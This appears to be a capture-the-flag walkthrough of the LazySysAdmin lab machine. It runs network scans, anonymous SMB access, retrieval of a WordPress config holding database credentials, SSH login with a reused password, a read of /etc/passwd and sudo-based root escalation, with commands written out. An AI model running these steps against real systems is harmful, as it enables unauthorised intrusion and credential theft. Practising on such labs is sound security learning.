LazySysAdmin Walkthrough :-

I personally enjoyed playing with this box, this box taught me how to stay focused while doing enumeration and exploitation. There’s so much going on with this box for post exploitation. let’s pwn it ..!!!

Network Scanning

We always start with network scanning, Let’s find the target IP address by running netdiscover.

┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0

As we saw in netdiscover result. Our target ip address is 192.168.43.15

Enumeration/Reconnaissance

Our next step is scanning the target machine. let’s start with nmap.

┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.15

With the help of nmap we are able to scan all open tcp ports
Starting with the port number 139,445 which is smb,

┌─[✗]─[root@RDX]─[~]
└──╼#smbclient -L //192.168.43.15

we can use smbclient for sharing the file in the network. Here we are able to login successfully using anonymous login and now we can access the ‘share$’ drive.

┌─[✗]─[root@RDX]─[~]
└──╼ #smbclient ‘\\192.168.43.15/share$’

smb: \> ls

smb: \> get deets.txt

smb: \> get robots.txt

smb: \> ls

smb: \> cd wordpress\

smb: \wordpress\> ls

smb: \wordpress\> get wp-config.php

┌─[✗]─[root@RDX]─[~]
└──╼ #cat wp-config.php

(‘DB_USER’, ‘Admin’);

(‘DB_PASSWORD’, ‘TogieMYSQL12345^^’);

open in browser http://192.168.43.124/wordpress

now i have my user

┌─[root@RDX]─[~]
└──╼ #cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

THEN wp-user & find the user to ssh login

user- togie
passwd — 12345

┌─[root@RDX]─[~]
└──╼ #ssh togie@192.168.43.15

Privilege Escalationtogie@LazySysAdmin:~$ id

togie@LazySysAdmin:~$ cat /etc/passwd

Privilege Escalation

2 ways to root the machine :-

1

togie@LazySysAdmin:~$ sudo -i
[sudo] password for togie:
root@LazySysAdmin:~# id

uid=0(root) gid=0(root) groups=0(root)

2

togie@LazySysAdmin:~$ sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’
[sudo] password for togie:

root@LazySysAdmin:~# id

uid=0(root) gid=0(root) groups=0(root)

root@LazySysAdmin:~# cat proof.txt